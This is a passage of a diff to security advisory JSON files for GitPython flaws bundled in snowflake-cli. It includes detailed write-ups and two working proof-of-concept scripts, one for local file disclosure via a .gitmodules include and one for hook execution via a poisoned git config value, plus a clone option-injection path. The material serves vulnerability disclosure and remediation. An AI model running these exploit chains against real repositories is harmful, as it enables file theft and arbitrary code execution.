`git/objects/submodule/base.py`, cross-checked against the fix commit that hardened the sibling code path but not this one; exploit chain reproduced independently, twice, against the current HEAD (a throwaway secret file and `/etc/passwd`).\n\n\n## Proof-of-Concept source (`gitpython-003-poc.py`)\n\n```python\n#!/usr/bin/env python3\n\"\"\"\nGITPYTHON-003 PoC: `.gitmodules` -- fully attacker-controlled content shipped\ninside a cloned repository -- can contain `[include] path = `.\n`Submodule._config_parser()` builds the parser used for `repo.submodules` (and\nother submodule reads) via `SubmoduleConfigParser(fp_module, read_only=...)`\nwithout passing `merge_includes=False`, so the class default `merge_includes=True`\nis inherited. GitConfigParser then opens the target file; if it isn't valid\ngit-config syntax (true of virtually any non-gitconfig file), Python's\n`configparser.MissingSectionHeaderError` embeds the file's first line verbatim\nin its exception message, which propagates out of the ordinary, read-only\n`repo.submodules` call -- a non-blind local file content disclosure primitive.\n\nRun:\n PYTHONPATH=\":/gitdb:/smmap\" python3 gitpython-003-poc.py \n\nBenign: reads only the given (defaults to a throwaway secret file\ncreated under if omitted) and never writes/exfiltrates it anywhere\nexcept printing it locally to prove the primitive. No destructive action.\n\"\"\"\nimport os\nimport subprocess\nimport sys\n\n\ndef main():\n workdir = sys.argv[1] if len(sys.argv) > 1 else \"/tmp/gitpython-003-poc\"\n target_file = sys.argv[2] if len(sys.argv) > 2 else os.path.join(workdir, \"secret.txt\")\n\n attacker_repo = os.path.join(workdir, \"attacker-repo\")\n dest = os.path.join(workdir, \"dest\")\n for p in (attacker_repo, dest):\n os.makedirs(p, exist_ok=True)\n\n if not os.path.exists(target_file):\n os.makedirs(os.path.dirname(target_file), exist_ok=True)\n with open(target_file, \"w\") as f:\n f.write(\"TOP-SECRET-DB-PASSWORD=hunter2-actual-secret-value\\n\")\n\n subprocess.run([\"git\", \"init\", \"-q\", \"-b\", \"main\", attacker_repo], check=True)\n subprocess.run([\"git\", \"-C\", attacker_repo, \"config\", \"user.email\", \"a@example.com\"], check=True)\n subprocess.run([\"git\", \"-C\", attacker_repo, \"config\", \"user.name\", \"Attacker\"], check=True)\n\n with open(os.path.join(attacker_repo, \"file.txt\"), \"w\") as f:\n f.write(\"hello\\n\")\n\n with open(os.path.join(attacker_repo, \".gitmodules\"), \"w\") as f:\n f.write(\n '[submodule \"totally-normal-dep\"]\\n'\n \"\\tpath = vendor/dep\\n\"\n \"\\turl = https://example.com/dep.git\\n\"\n \"[include]\\n\"\n \"\\tpath = %s\\n\" % target_file\n )\n\n subprocess.run([\"git\", \"-C\", attacker_repo, \"add\", \"file.txt\", \".gitmodules\"], check=True)\n subprocess.run([\"git\", \"-C\", attacker_repo, \"commit\", \"-q\", \"-m\", \"init\"], check=True)\n\n import git # gitpython under test\n import configparser\n\n repo = git.Repo.clone_from(attacker_repo, dest)\n\n try:\n subs = list(repo.submodules)\n print(\"NOT VULNERABLE: no exception raised, submodules =\", subs)\n sys.exit(1)\n except configparser.MissingSectionHeaderError as e:\n msg = str(e)\n print(\"VULNERABLE: MissingSectionHeaderError leaked file content via repo.submodules:\")\n print(msg)\n with open(target_file) as f:\n first_line = f.readline().rstrip(\"\\n\")\n if first_line in msg:\n print(\"Confirmed: target file's first line is present verbatim in the exception message.\")\n sys.exit(0)\n else:\n print(\"NOT VULNERABLE: exception message did not contain the expected content\")\n sys.exit(1)\n\n\nif __name__ == \"__main__\":\n main()\n\n```", "severity": [ { "type": "CVSS_V3", - "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" } ], "references": [ + { + "type": "WEB", + "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-7833-fr7j-v32q" + }, { "type": "ADVISORY", - "url": "https://www.vulncheck.com/advisories/gitpython-before-local-file-content-disclosure-via-gitmodules" + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-78675" }, { - "type": "EVIDENCE", - "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-7833-fr7j-v32q" + "type": "WEB", + "url": "https://github.com/gitpython-developers/GitPython/pull/2211" + }, + { + "type": "WEB", + "url": "https://github.com/gitpython-developers/GitPython/commit/ef7568e3b317ce617eacda39b8b54dcdff8c3b5c" + }, + { + "type": "PACKAGE", + "url": "https://github.com/gitpython-developers/GitPython" + }, + { + "type": "WEB", + "url": "https://github.com/gitpython-developers/GitPython/releases/tag/3.1.59" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/advisory-database/tree/main/vulns/gitpython/PYSEC-2026-3785.yaml" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/gitpython-before-local-file-content-disclosure-via-gitmodules" } ] } diff --git a/advisories/BREW-snowflake-cli-CVE-2026-78676.json b/advisories/BREW-snowflake-cli-CVE-2026-78676.json index bc87c1e7070..839d4a4fffd 100644 --- a/advisories/BREW-snowflake-cli-CVE-2026-78676.json +++ b/advisories/BREW-snowflake-cli-CVE-2026-78676.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snowflake-cli-CVE-2026-78676", "published": "2026-09-04T10:05:02Z", - "modified": "2026-09-04T10:05:02Z", + "modified": "2026-09-10T20:56:16Z", "upstream": [ "PYSEC-2026-3786", "CVE-2026-78676", @@ -21,16 +21,19 @@ "events": [ { "introduced": "0" + }, + { + "fixed": "3.27.0" } ] } ], "ecosystem_specific": { - "fix": null, - "range_state": "affected", + "fix": "bump", + "range_state": "fixed", "upstream_fixed_in": "3.1.59", "resource": "gitpython", - "resource_purl": "pkg:pypi/gitpython@3.1.58" + "resource_purl": "pkg:pypi/gitpython@3.1.59" } } ], @@ -43,27 +46,44 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "gitpython", - "subject_version": "3.1.58", - "key": "pkg:pypi/gitpython@3.1.58", + "subject_version": "3.1.59", + "key": "pkg:pypi/gitpython@3.1.59", "resource": "gitpython" } ] }, - "details": "GitPython before 3.1.59 fails to safely re-serialize multi-line git-config values during write operations, corrupting dormant quoted values into injected directives like core.hooksPath. Attackers can craft config files with embedded newlines that become live git directives after any unrelated GitPython config write, enabling arbitrary code execution via hook invocation.", + "summary": "GitPython: Dormant multi-line git-config values are corrupted into live injected directives (e.g. core.hooksPath) on any unrelated GitConfigParser write, enabling RCE", + "details": "- **CWE:** CWE-88 (Argument Injection) / CWE-94 (Code Injection) — via a read-then-corrupt-on-rewrite config round trip, not a direct setter argument\n- **Affected component:** `git/config.py` — `GitConfigParser._read()` (multi-line value decoding, lines 444-541, esp. `string_decode()` at line 460 and its call sites at 519/541) and `GitConfigParser._write()`/`write_section()` (serialization, lines ~694-712, esp. line 708)\n- **Affected version:** GitPython at HEAD (`9729ed3b948f2bde09f1f188c5311e172212b67e`, 2026-08-05, VERSION `3.1.58`)\n\n## Reachability\nGitPython added `UNSAFE_CONFIG_CHARS_RE` / `_value_to_string_safe()` / `_assure_config_name_safe()` guards (commits `c417af46`, `1ed1b924`, `a495ccd3`, and PR #2176) to reject a Python string containing a raw `\\r`/`\\n`/NUL byte, or syntax-bearing characters, when it is passed as an **argument** to `set()`, `set_value()`, `add_value()`, or `add_section()`. This closed the four config-injection GHSAs above.\n\nThat guard is applied only on the write-argument surface. It is never consulted for values that entered `GitConfigParser._sections` via `_read()` — i.e. values that came from parsing an on-disk config file. And `_read()` legitimately supports standard, spec-compliant git config syntax for multi-line values: a quoted value that is not closed on the same physical line continues onto the next physical line (git's own backslash-continuation syntax), and `string_decode()` (`.decode('unicode_escape')`) decodes a literal two-character `\\n` **escape sequence** inside such a value into a real embedded LF character in the resulting Python string. No raw control byte is ever written to disk to achieve this — it's the same syntax real `git` itself uses and accepts.\n\nThe bug is in what happens when that `GitConfigParser` is later **flushed**: `write_section()` (line ~694) calls the *unsafe* `self._value_to_string(v)` — not `_value_to_string_safe()` — and \"handles\" any embedded newline in the value with `.replace(\"\\n\", \"\\n\\t\")` (line 708), emitting a bare, unquoted `` in the output file with no re-quoting and no backslash-continuation marker. Real git does **not** treat an indentation-only continuation the way GitPython's writer assumes — a value only continues across physical lines when the *previous* line ends in a literal `\\` immediately before the newline. So the moment `write_section()` re-serializes a previously-decoded multi-line value this way, the second half of that value becomes an **independent, new config line** the next time anyone (GitPython or real `git`) parses the file. If an attacker chooses the dormant value's content to be `\\nhooksPath = `, that second line is parsed as a brand-new `core.hooksPath = ` directive — live, real Git configuration, not a value.\n\n`core.hooksPath` is honored by essentially every hook-firing git operation (`commit`, `checkout`, `merge`, `push`, `rebase`, ...), giving arbitrary code execution the next time the host application performs any hook-triggering operation.\n\n## Root cause\n`GitConfigParser`'s injection guard is asymmetric: it hardens every *write-argument* entry point (the fix for the four sibling GHSAs) but never hardens the **read → corrupt-on-rewrite round trip**. A value that is 100% legitimate and inert as parsed from disk becomes a newly-injected directive purely through GitPython's own broken re-serialization logic (`write_section()` using the unsafe value-to-string path plus a continuation scheme real git doesn't recognize). The `c417af46` commit message even states its intent explicitly: *\"This preserves existing read behavior for config files that already contain multiline values while preventing GitPython from writing new unsafe values\"* — i.e. the maintainers consciously scoped the fix to the write-argument surface and did not address what happens when an already-resident multi-line value gets rewritten.\n\n## Exploit path\n1. A `.git/config` (or any file merged into it via `[include]`, see below) already contains a dormant, syntactically-legitimate multi-line quoted value, e.g.:\n ```\n [core]\n \tzzz = \"A\\nhooksPath = ../evil-hooks\\\n \"\n ```\n No raw `\\r`, `\\n`, or NUL byte appears on disk — this is standard git quoting + backslash-continuation. Real `git config --get core.hookspath` returns nothing at this point (inert); `git config --get core.zzz` returns the decoded string `A\\nhooksPath = ../evil-hooks`, identically to GitPython's own reader.\n2. The host application opens this repo with GitPython (`git.Repo(path)`, `read_only=False` implicitly for a normal `config_writer()` use) and performs **any** single, unrelated, legitimate config write on the same `GitConfigParser` instance — e.g. `repo.config_writer().set_value(\"user\", \"name\", \"Test User\")`. This is one of the most ordinary operations a GitPython-based tool performs.\n3. `GitConfigParser._write()`/`write_section()` re-serializes every resident value, including the dormant `zzz` entry, using the unsafe path. The file on disk now contains, verbatim:\n ```\n [core]\n \t...\n \tzzz = A\n \thooksPath = ../evil-hooks\n ```\n4. Real `git config --get core.hookspath` now returns `../evil-hooks` — a key that did not exist before step 2, created purely by GitPython's own write.\n5. The next hook-firing git operation (e.g. `git commit`) executes `../evil-hooks/pre-commit` (or whatever hook name the operation looks for), i.e. arbitrary attacker-chosen code execution.\n\n## Impact\nArbitrary code execution, on par with (and more directly triggered than) the already-accepted, High-severity `GHSA-mv93-w799-cj2w`/`GHSA-v87r-6q3f-2j67` \"Newline injection... enables RCE via core.hooksPath\" advisories, and requiring **no unsafe caller argument at all** — only an attacker-influenced config file plus one ordinary, unrelated write.\n\n## Preconditions\n- A config file GitPython opens read-write already contains an attacker-chosen, syntactically-valid multi-line value shaped like `\\n = `. Realistic delivery:\n 1. **Pre-existing `.git` directory shipped with a repository** — vendored/template repos, CI workspace/layer caches that preserve `.git`, \"repo\" tarball/zip distributions that include `.git/config`. The poisoned value sits directly in `.git/config`.\n 2. **The documented shared-config `[include]` pattern** (`[include] path = ../`, pointing at a file inside the working tree) — `GitConfigParser.read()` merges included files' sections into the same `_sections` dict used for writing, so a malicious public repository can ship the poisoned value inside a normal tracked file and have it activated the first time any GitPython-based tool performs any unrelated config write after clone (this requires the victim's own `.git/config` to already reference the include, e.g. via project setup tooling that adds `include.path`).\n 3. **Any host application that opens an attacker-influenced config file for read-write and later performs a legitimate write** — the exact trust-boundary the maintainers already accepted as realistic for `GHSA-v87r-6q3f-2j67` (their writeup cites MLRun's `project.push()`).\n- No authentication/role requirement inside GitPython itself.\n\n## Evidence\n- `git/config.py:460` (`string_decode`), invoked at `git/config.py:519` and `:541` inside `_read()`'s multi-line handling — decodes `unicode_escape`, turning a literal `\\n` escape into a real embedded LF.\n- `git/config.py:~694-712` (`_write()`/`write_section()`) — uses `self._value_to_string(v)` (unsafe variant) and `.replace(\"\\n\", \"\\n\\t\")` with no re-quoting.\n- `c417af46` (the CR/LF/NUL guard commit) touches only the setter path and explicitly states it preserves existing *read* behavior for multi-line values, per its own commit message.\n- `git log -S\"string_decode\"`, `-S\"write_section\"`, `-S'replace(\"\\n\", \"\\n\\t\")'` on `git/config.py` show these code paths have only ever been touched by non-security formatting/refactor commits (`a5fc1d86`, `b825dc74`, `cb68eef0`, `21ec5299`), never by a security fix.\n- PoC (`gitpython-002-poc.py`, embedded below) reproduces the full chain end-to-end against this exact checkout: dormant value → one unrelated `config_writer()` write → `core.hookspath` becomes live per real `git config --get` → a subsequent `git commit` executes the injected hook and writes a benign marker file.\n\n## False-positive check (adversarial re-read)\n- **Is this just a repeat of the four already-fixed config-injection GHSAs?** No — all four require the *caller* to pass a Python string containing a raw control character or forbidden syntax character as an argument to a setter; all four are now blocked by `UNSAFE_CONFIG_CHARS_RE`/`VALID_CONFIG_OPTION_NAME_RE`/the section quote-state-machine. This finding requires no such caller argument: the payload is smuggled entirely inside a config *file* using standard, valid git escaping that the guard never inspects, and only becomes dangerous through GitPython's own unguarded re-serialization of a value it already holds. Confirmed via `_known-advisories.json` (26 entries, none withdrawn) — none describe this read→corrupt-on-rewrite mechanism.\n- **Does real git actually round-trip this value safely (i.e. is this a GitPython-only bug, not a \"normal\" file)?** Yes, confirmed empirically: after the same crafted `.git/config` is rewritten by *real* `git config user.name Test2` (a control test), the multi-line `zzz` entry is preserved byte-for-byte in its original quoted/continuation form — only GitPython's writer corrupts it.\n- **Is there a guard elsewhere that would catch the resulting bare `hooksPath = ...` line before it's trusted?** No — once on disk, it is indistinguishable from a directive the user set intentionally; `core.hooksPath` is honored unconditionally by git's hook-invocation machinery.\n- **Does this require an unrealistic precondition?** The precondition (a config file with attacker-influenced content, later legitimately rewritten) mirrors the exact threat model the maintainers already treated as realistic and fixed for `GHSA-v87r-6q3f-2j67`.\n- Verdict: no concrete blocker found. **CONFIRMED** — reproduced independently end-to-end (dormant value in place → benign unrelated `config_writer()` write → `core.hookspath` live per real git → hook fires on `git commit`, marker file written).\n\n## Remediation\nEither (a) make `write_section()`/`_write()` use `_value_to_string_safe()` (or equivalent re-quoting) for **every** resident value, including those that originated from `_read()`, so an embedded newline is always re-emitted as a properly quoted+backslash-continued value rather than a bare new line, or (b) reject/neutralize embedded control characters in values at read time before they can reach `_sections` at all if the parser is opened in `read_only=False` mode, or (c) canonicalize output using git's own `git config --file --replace-all` semantics instead of a hand-rolled writer. Option (a) is the most surgical fix and matches the spirit of `_value_to_string_safe()` already used on the setter path.\n\n## Confidence\nHigh. Root cause independently re-derived and confirmed by direct code reading; full exploit chain (dormant value → benign unrelated write → live `core.hookspath` → hook execution with a benign marker) reproduced twice, independently, against the current HEAD.\n\n\n## Proof-of-Concept source (`gitpython-002-poc.py`)\n\n```python\n#!/usr/bin/env python3\n\"\"\"\nGITPYTHON-002 PoC: a dormant, legitimately-encoded multi-line git-config value\n(standard quoted + backslash-continuation syntax, containing an escaped \"\\\\n\"\nthat decodes to a real embedded newline in memory) is corrupted into a NEW,\nlive config key the moment GitConfigParser re-serializes it during any\nunrelated write. If the smuggled second \"line\" looks like\n\"hooksPath = \", it becomes a real, active core.hooksPath after\none unrelated GitPython config write, and fires attacker code on the next\nhook-triggering git operation (e.g. `git commit`).\n\nThis is CWE-88/CWE-94 style argument/config injection, but via the READ path\n(a config file GitPython parses and later rewrites), not via a Python kwarg\nargument -- distinct from the already-fixed GHSA-mv93-w799-cj2w /\nGHSA-v87r-6q3f-2j67 / GHSA-3rp5-jjmw-4wv2 / GHSA-jm78-9fvv-mhgr, which all\nguard the setter-argument surface only.\n\nRun:\n PYTHONPATH=\":/gitdb:/smmap\" python3 gitpython-002-poc.py \n\nBenign: only writes/reads inside . The \"malicious\" hook just writes a\nmarker file; no destructive/exfiltrating payload. Exits non-zero and prints\n\"NOT VULNERABLE\" if the corruption / hook does not fire.\n\"\"\"\nimport os\nimport subprocess\nimport sys\n\n\ndef main():\n workdir = sys.argv[1] if len(sys.argv) > 1 else \"/tmp/gitpython-002-poc\"\n repo_dir = os.path.join(workdir, \"repo\")\n hooks_dir = os.path.join(workdir, \"evil-hooks\")\n marker = os.path.join(workdir, \"PWNED_MARKER.txt\")\n\n for p in (repo_dir, hooks_dir):\n os.makedirs(p, exist_ok=True)\n if os.path.exists(marker):\n os.remove(marker)\n\n subprocess.run([\"git\", \"init\", \"-q\", \"-b\", \"main\", repo_dir], check=True)\n subprocess.run([\"git\", \"-C\", repo_dir, \"config\", \"user.email\", \"test@example.com\"], check=True)\n subprocess.run([\"git\", \"-C\", repo_dir, \"config\", \"user.name\", \"Test\"], check=True)\n\n # Rewrite .git/config with a dormant, 100%-valid multi-line quoted value\n # inside [core] (before any other section). No raw CR/LF/NUL byte is\n # written to disk here -- this is standard git config quoting +\n # backslash-line-continuation, decoded by both real git and GitConfigParser\n # into the Python string 'A\\nhooksPath = ../evil-hooks'.\n cfg_path = os.path.join(repo_dir, \".git\", \"config\")\n with open(cfg_path) as f:\n original = f.read()\n poisoned_entry = '\\tzzz = \"A\\\\nhooksPath = ../evil-hooks\\\\\\n\"\\n'\n # Insert right after the [core] header line so it lives in the same section.\n new_config = original.replace(\"[core]\\n\", \"[core]\\n\" + poisoned_entry, 1)\n with open(cfg_path, \"w\") as f:\n f.write(new_config)\n\n # Confirm it's inert per real git before touching GitPython.\n pre = subprocess.run(\n [\"git\", \"-C\", repo_dir, \"config\", \"--get\", \"core.hookspath\"],\n capture_output=True, text=True,\n )\n if pre.returncode == 0:\n print(\"SETUP ERROR: core.hookspath already set before GitPython touched anything\")\n sys.exit(2)\n\n # Malicious hook: benign marker only.\n hook_path = os.path.join(hooks_dir, \"pre-commit\")\n with open(hook_path, \"w\") as f:\n f.write('#!/bin/sh\\necho \"PWNED-VIA-GITPYTHON-CONFIG-INJECTION\" > \"%s\"\\nexit 0\\n' % marker)\n os.chmod(hook_path, 0o755)\n\n import git # gitpython under test\n\n repo = git.Repo(repo_dir)\n before = repo.config_reader().get_value(\"core\", \"zzz\")\n print(\"core.zzz before any GitPython write =\", repr(before))\n\n # ONE totally unrelated, benign write -- this is the only \"attacker-adjacent\"\n # action required, and it is something virtually every GitPython consumer\n # does routinely (setting an option, adding a remote, updating a branch's\n # tracking config, ...).\n with repo.config_writer() as cw:\n cw.set_value(\"user\", \"name\", \"Test User\")\n\n post = subprocess.run(\n [\"git\", \"-C\", repo_dir, \"config\", \"--get\", \"core.hookspath\"],\n capture_output=True, text=True,\n )\n if post.returncode != 0:\n print(\"NOT VULNERABLE: core.hookspath still absent after the unrelated write\")\n sys.exit(1)\n\n injected_path = post.stdout.strip()\n print(\"core.hookspath is now LIVE after one unrelated write:\", injected_path)\n\n # Trigger the hook with a normal commit to prove it fires.\n with open(os.path.join(repo_dir, \"file2.txt\"), \"w\") as f:\n f.write(\"change\\n\")\n subprocess.run([\"git\", \"-C\", repo_dir, \"add\", \"file2.txt\"], check=True)\n subprocess.run(\n [\"git\", \"-C\", repo_dir, \"-c\", \"user.email=t@example.com\", \"-c\", \"user.name=T\",\n \"commit\", \"-q\", \"-m\", \"trigger hook\"],\n check=True,\n )\n\n if os.path.isfile(marker):\n with open(marker) as f:\n content = f.read().strip()\n print(\"VULNERABLE: hook fired, marker content =\", content)\n sys.exit(0)\n else:\n print(\"NOT VULNERABLE: hook did not fire\")\n sys.exit(1)\n\n\nif __name__ == \"__main__\":\n main()\n\n```", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + }, { "type": "CVSS_V4", - "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" } ], "references": [ + { + "type": "WEB", + "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-284h-m62q-gf8w" + }, { "type": "ADVISORY", - "url": "https://www.vulncheck.com/advisories/gitpython-before-remote-code-execution-via-config-injection" + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-78676" }, { - "type": "EVIDENCE", - "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-284h-m62q-gf8w" + "type": "PACKAGE", + "url": "https://github.com/gitpython-developers/GitPython" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/advisory-database/tree/main/vulns/gitpython/PYSEC-2026-3786.yaml" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/gitpython-before-remote-code-execution-via-config-injection" } ] } diff --git a/advisories/BREW-snowflake-cli-CVE-2026-78677.json b/advisories/BREW-snowflake-cli-CVE-2026-78677.json index 98dacc503ff..f2c23297ef0 100644 --- a/advisories/BREW-snowflake-cli-CVE-2026-78677.json +++ b/advisories/BREW-snowflake-cli-CVE-2026-78677.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snowflake-cli-CVE-2026-78677", "published": "2026-09-04T10:05:02Z", - "modified": "2026-09-04T10:05:02Z", + "modified": "2026-09-10T20:56:30Z", "upstream": [ "PYSEC-2026-3787", "CVE-2026-78677", @@ -21,16 +21,19 @@ "events": [ { "introduced": "0" + }, + { + "fixed": "3.27.0" } ] } ], "ecosystem_specific": { - "fix": null, - "range_state": "affected", + "fix": "bump", + "range_state": "fixed", "upstream_fixed_in": "3.1.59", "resource": "gitpython", - "resource_purl": "pkg:pypi/gitpython@3.1.58" + "resource_purl": "pkg:pypi/gitpython@3.1.59" } } ], @@ -43,27 +46,56 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "gitpython", - "subject_version": "3.1.58", - "key": "pkg:pypi/gitpython@3.1.58", + "subject_version": "3.1.59", + "key": "pkg:pypi/gitpython@3.1.59", "resource": "gitpython" } ] }, - "details": "GitPython before 3.1.59 omits --separate-git-dir from unsafe_git_clone_options, allowing attackers to create arbitrary git directories outside the intended clone destination. Attackers can pass a separate_git_dir parameter to Repo.clone_from() or Repo.clone() to redirect repository metadata to an attacker-controlled filesystem path, enabling arbitrary directory creation and potential hook execution.", + "summary": "GitPython: clone_from()/clone() omit --separate-git-dir from unsafe_git_clone_options, enabling arbitrary git-directory creation outside the destination", + "details": "- **CWE:** CWE-73 (External Control of File Name or Path) / CWE-22 (Path Traversal, in the \"escapes intended base directory\" sense)\n- **Affected component:** `git/repo/base.py`, `Repo.unsafe_git_clone_options` (class attribute, lines 153-165) and `Repo._clone()` (lines 1477-1520), reached via the public `Repo.clone_from()` (line 1626) and `Repo.clone()` (line 1567) APIs.\n- **Affected version:** GitPython at HEAD (`9729ed3b948f2bde09f1f188c5311e172212b67e`, 2026-08-05, VERSION `3.1.58`)\n\n## Reachability\n`Repo.clone_from(url, to_path, **kwargs)` (and `Repo.clone()`) forward arbitrary keyword arguments to the underlying `git clone` invocation. Before forwarding, GitPython builds a candidate option list from the kwargs (`Git._option_candidates`) and checks it against a denylist, `Repo.unsafe_git_clone_options`, via `Git.check_unsafe_options()` — *unless* the caller passes `allow_unsafe_options=True`. This denylist mechanism is exactly the guard that the last ~16 published GHSAs against this repo (2026-07-12 → 2026-08-05) have repeatedly found incomplete or bypassable for other options (`--template`, `--upload-pack`, `--config`, `--exec`, `--output`, `--index-output`, `--pathspec-from-file`, etc.).\n\n`git clone` also accepts `--separate-git-dir=`, which redirects the repository's entire `.git` metadata directory to an **arbitrary, caller-controlled filesystem path**, leaving only a gitlink text file (`gitdir: `) at the intended destination. This is the exact same primitive already recognized as unsafe by GitPython's own code: `Repo.unsafe_git_init_options` (line 145-150) blocks `--separate-git-dir` for `Repo.init()`, with the comment *\"Redirects the repository metadata to a caller-controlled path\"*. The `Repo._clone()`/`clone()`/`clone_from()` docstring (line 1450-1452) is even more explicit:\n\n```\n:param allow_unsafe_options:\n Allow unsafe options to be used, such as ``--template`` and\n ``--separate-git-dir``.\n```\n\ni.e. the maintainers' own documentation states that `allow_unsafe_options=False` (the default) is supposed to block `--separate-git-dir` for clone. But **`Repo.unsafe_git_clone_options` does not contain it**:\n\n```python\nunsafe_git_clone_options = [\n \"--upload-pack\",\n \"-u\",\n \"--config\",\n \"-c\",\n \"--template\",\n \"--bundle-uri\",\n]\n```\n\nSo any application that forwards a `separate_git_dir` (or `separate-git-dir`) kwarg into `Repo.clone_from()` / `Repo.clone()` — e.g. a CI/build service, a Git-hosting proxy, or any tool that exposes a subset of clone options to a client, the exact threat model already accepted for the sibling `--template`/`--upload-pack`/`--config` entries in this same list — gets **no protection at all** for `--separate-git-dir`, even with the default `allow_unsafe_options=False`.\n\n## Root cause\nParity gap between two sibling denylists that guard the same underlying primitive (arbitrary redirection of git metadata storage): `unsafe_git_init_options` correctly lists `--separate-git-dir`; `unsafe_git_clone_options`, covering the same option on a different git subcommand that also accepts it, does not — despite the function's own docstring claiming otherwise. This is the same \"denylist omits an equally-dangerous sibling option\" pattern already responsible for `GHSA-539m-9xh6-q6rr` (`archive` denylist missing `--add-file`/`--add-virtual-file`) and `GHSA-6p8h-3wgx-97gf` (`clone` denylist missing `--template`, since fixed).\n\n## Exploit path\n1. Attacker-controlled input reaches a `separate_git_dir=...` (or equivalently `\"separate-git-dir\"`) keyword argument passed into `Repo.clone_from()` / `Repo.clone()` by the host application, with `allow_unsafe_options` left at its default `False`.\n2. `Git._option_candidates()` renders this as `--separate-git-dir` and `Git.check_unsafe_options()` checks it against `Repo.unsafe_git_clone_options` — no match, no `UnsafeOptionError` raised.\n3. `Git.transform_kwargs()` renders the same kwarg into the real command line as `--separate-git-dir=` and GitPython executes `git clone -v --separate-git-dir= -- ` via `subprocess` (no shell).\n4. `git` itself creates the full repository metadata tree (`config`, `description`, `HEAD`, `hooks/`, `index`, `objects/`, `refs/`, `packed-refs`, `logs/`) at the attacker-specified path — which can be **any path outside the intended clone destination** that the process has permission to create — and leaves a gitlink file at the intended destination pointing to it.\n\n## Impact\nArbitrary directory/file creation at a path fully controlled by the attacker (bounded only by filesystem permissions of the process running GitPython), matching the impact class of the already-published, High-severity `GHSA-hmq2-w58f-27jc` (\"Arbitrary Git Repository Creation Outside the Working Tree\", CVSS 8.2). Concretely:\n- Planting a git repository structure (including a `hooks/` directory) at an attacker-chosen location outside the sandboxed clone destination the calling application intended to confine the operation to.\n- If the attacker-chosen path collides with an existing directory the process can write into (e.g. another repository's `.git`, a shared cache path, a predictable temp location), the clone silently populates/overwrites `config`, `HEAD`, `hooks/*`, `refs/*`, `packed-refs`, and `index` there — an integrity violation of a resource outside the intended destination.\n- Combined with any later operation that runs `git` against that redirected/colliding directory (common in CI/build systems that reuse or predict working-directory layouts), this can escalate to hook execution, matching the RCE class already accepted for `--template` in `GHSA-9rj7-rf2p-w77r`.\n\n## Preconditions\n- The calling application forwards a caller-influenced value into a `separate_git_dir` kwarg of `Repo.clone_from()`/`Repo.clone()` (or into the `multi_options` list as a raw `--separate-git-dir=...` token) without itself validating/rejecting it, and does not pass `allow_unsafe_options=True` intentionally. This is the identical trust model GitPython's own denylist already defends for `--template`/`--upload-pack`/`--config`/`--bundle-uri` on the very same code path — i.e. this option was clearly meant to be covered by the same guard and was simply omitted.\n- No authentication/role requirement inside GitPython itself; the vulnerable code runs the moment the host application calls the API with the option present.\n\n## Evidence\n- `git/repo/base.py:145-151` — `unsafe_git_init_options` includes `\"--separate-git-dir\"` with the comment \"Redirects the repository metadata to a caller-controlled path\".\n- `git/repo/base.py:153-165` — `unsafe_git_clone_options` (the list actually enforced on `_clone`) does **not** include `\"--separate-git-dir\"`.\n- `git/repo/base.py:1450-1452` — docstring of `clone_from`/`clone` explicitly documents `--separate-git-dir` as one of the options `allow_unsafe_options` is supposed to gate.\n- `git/repo/base.py:1495-1518` — `_clone()` special-cases `separate_git_dir` only to `Git.polish_url()` it (path normalization for URL-like values), then runs it through `Git.check_unsafe_options(options=..., unsafe_options=cls.unsafe_git_clone_options)` — which, per the list above, does not flag it.\n- PoC (`gitpython-001-poc.py`, embedded below) run against this exact checkout confirms the option reaches the real `git clone` subprocess unguarded and creates a full git directory outside the destination path, with `allow_unsafe_options` at its default `False`.\n\n## False-positive check (adversarial re-read)\n- **Is there a value-level check that would still stop this?** No — `check_unsafe_options` only inspects option *names* (via `_canonicalize_option_name`) against the denylist; it performs no filesystem/path validation on `separate_git_dir`'s value, and no other guard in `_clone()` touches this kwarg besides the `Git.polish_url()` normalization (which does not reject arbitrary paths).\n- **Is `--separate-git-dir` perhaps a no-op or safely sandboxed for `clone` specifically (unlike `init`)?** No — confirmed empirically: the option reaches the real `git` binary unmodified and git honors it exactly as documented, writing the full metadata tree to the given path.\n- **Could this be the exact bug already covered by one of the 26 published GHSAs?** Checked all 26 entries in `_known-advisories.json` (Filter 0): `GHSA-9rj7-rf2p-w77r` covers `--template` in `Repo.init`; `GHSA-6p8h-3wgx-97gf` covers `--template` in clone (already fixed, present in `unsafe_git_clone_options`); `GHSA-hmq2-w58f-27jc` covers arbitrary repo creation via unvalidated **`.gitmodules` submodule names** (a different code path — `Submodule`, not `Repo.clone_from()` kwargs). None reference `--separate-git-dir` on the clone path. This is a distinct, currently-unpatched gap.\n- **Does this require an unrealistic precondition?** The precondition (host app forwards a kwarg into `clone_from`/`clone`) is identical to the precondition already accepted by the maintainers for the sibling entries in the same list 